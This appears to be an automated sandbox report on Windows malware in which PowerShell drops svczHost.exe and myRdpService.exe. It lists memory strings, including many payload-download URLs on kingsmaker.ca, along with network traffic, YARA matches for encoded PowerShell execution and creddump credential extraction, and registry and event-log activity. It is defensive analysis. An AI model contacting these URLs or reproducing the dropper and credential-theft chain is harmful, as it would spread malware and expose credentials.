Source: svczHost.exe, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
Source: powershell.exe, 00000000.00000002.3608263403.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD1F1000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD39E1000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.3512132506.000002B48137C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000004.00000002.3512132506.000002B4814CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: myRdpService.exe	String found in binary or memory: http://www.gstatic.com/generate_204
Source: svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204y
Source: powershell.exe, 00000010.00000002.4147110154.000002AAEBE44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.3644439665.0000015FEBCBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3533295106.000002B4FAF70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4436671344.00000223E52D4000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4740236160.0000030543F00000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACD38000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACCF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4136909303.000002AAEBB18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4147110154.000002AAEBE44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DD4F6000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741722082.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4741339369.00007FF7FAAAF000.00000004.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B0A48000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe	String found in binary or memory: https://aka.ms/dotnet-warnings/
Source: svczHost.exe, myRdpService.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: myRdpService.exe	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: powershell.exe, 00000008.00000002.4319253309.00000223DDCA0000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAD3A000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B1346000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: powershell.exe, 00000000.00000002.3608263403.0000015F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD39E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svczHost.exe, 0000000C.00000002.4735951323.000002C4B0A48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/MartinKuschnik/WmiLight
Source: powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD3C0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3844549504.0000024E4BD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000004.00000002.3512132506.000002B4814CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4814F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000008.00000002.4319253309.00000223DD4F6000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4741722082.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000000.3813098421.00007FF7FAC21000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 0000000C.00000002.4735951323.000002C4B0A48000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/dotnet/runtime
Source: powershell.exe, 00000004.00000002.3512132506.000002B480E2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD4491000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000010.00000002.4136909303.000002AAEBB18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B4805C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD5C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CEA7E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca
Source: powershell.exe, 00000000.00000002.3608263403.0000015F805BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663bb648db58ef92
Source: powershell.exe, 00000000.00000002.3608263403.0000015F806E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663ea0555ae9c0d6
Source: powershell.exe, 00000008.00000002.3831537178.00000223CD5FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b6645a53d59434ce3
Source: powershell.exe, 00000000.00000002.3608263403.0000015F80673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66d3f1253c06c3f3
Source: svczHost.exe, 0000000C.00000002.4734447817.000002C4B00A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/StaticFile/RdpService/52
Source: svczHost.exe, 0000000C.00000002.4734447817.000002C4B00A8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/StaticFile/RdpService/52h
Source: svczHost.exe, 0000000C.00000002.4734447817.000002C4B0093000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/StaticFile/RdpService/52vice
Source: powershell.exe, 00000000.00000002.3608263403.0000015F80673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/15d47d61496bbc5686d7406c0812dea52edfae361c42a72b85312aef81a346647d70b9be
Source: powershell.exe, 00000000.00000002.3608263403.0000015F805BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3608263403.0000015F8062D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/1cbf3117c11b4baa44d1af2ed672d3f7e682f880ba2af6da9ab49b05b6edeb6dea5522ed
Source: powershell.exe, 00000000.00000002.3608263403.0000015F806E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/2db1653a19d9e7820417a355a5bebd72b81f7e460fa70a5a1edfbf43f5b246051372de1d
Source: powershell.exe, 00000008.00000002.3831537178.00000223CD5FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec46957553fd4ccfb234669d52f6f2a278556703b98ac
Source: powershell.exe, 00000004.00000002.3512132506.000002B480269000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/31b8a1b5c89fe194298b8a9855e2443860920f3b00d19a946f931f7c332bd239766e1de8
Source: powershell.exe, 00000008.00000002.3831537178.00000223CD41E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3831537178.00000223CD1F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37
Source: powershell.exe, 00000000.00000002.3608263403.0000015F8022B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://kingsmaker.ca/file3/f4c66a2f2c057f3b06250f3211c5a32657d9f73187a74ad9a0c73befa87bed5adaa1b59e
Source: powershell.exe, 00000000.00000002.3636123689.0000015F9007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3512132506.000002B481648000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3528495441.000002B49007B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4319253309.00000223DD26D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4104980578.000002AAE3B99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3863965405.000002AAD4E2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.4043493845.0000024E5BBA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.3644439665.0000015FEBCBD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3533295106.000002B4FAF70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.4436671344.00000223E52D4000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4740236160.0000030543F00000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACD38000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 0000000C.00000002.4732861913.000002C4ACCF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4136909303.000002AAEBB18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4147110154.000002AAEBE44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000004.00000002.3512132506.000002B48137C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.67:443 -> 192.168.11.20:49758 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Windows\Temp\myRdpService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_7088.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 37.2.myRdpService.exe.7ff6f9de0000.0.unpack, type: UNPACKEDPE	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: 00000025.00000002.4737674949.00007FF6FA2E6000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
Source: Process Memory Space: powershell.exe PID: 8976, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: svczHost.exe PID: 3468, type: MEMORYSTR	Matched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\svczHost.exe

Jump to dropped file

Uses regedit.exe to modify the Windows registry

Source: C:\Windows\Temp\myRdpService.exe

Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\file

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB993492D6	0_2_00007FFB993492D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB9934A082	0_2_00007FFB9934A082
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFB99350FDA	0_2_00007FFB99350FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFB99331FAF	8_2_00007FFB99331FAF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFB993277A6	16_2_00007FFB993277A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFB99328552	16_2_00007FFB99328552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFB9931BB69	20_2_00007FFB9931BB69

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\myRdpService.exe 6D42E3ACF08D81CC6B47693E0A38B22A59B15BB904AEAA914775356CF531FC90

Source: svczHost.exe.8.dr

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3675
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3628
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 3675	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3628	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: Commandline size = 2904

Source: amsi64_7088.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 37.2.myRdpService.exe.7ff6f9de0000.0.unpack, type: UNPACKEDPE	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: 00000025.00000002.4737674949.00007FF6FA2E6000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
Source: Process Memory Space: powershell.exe PID: 8976, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: svczHost.exe PID: 3468, type: MEMORYSTR	Matched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump

Source: classification engine

Classification label: mal100.troj.expl.evad.winPS1@75/54@1/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2400:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4468:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5392:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6504:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2984:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:964:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6036:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9096:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:4468:304:WilStaging_02
Source: C:\Windows\Temp\myRdpService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7804:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:5392:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2400:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7080:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\STARTUAC
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:9096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5068:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4352:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:2984:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r25gsz15.4o2.ps1

Jump to behavior

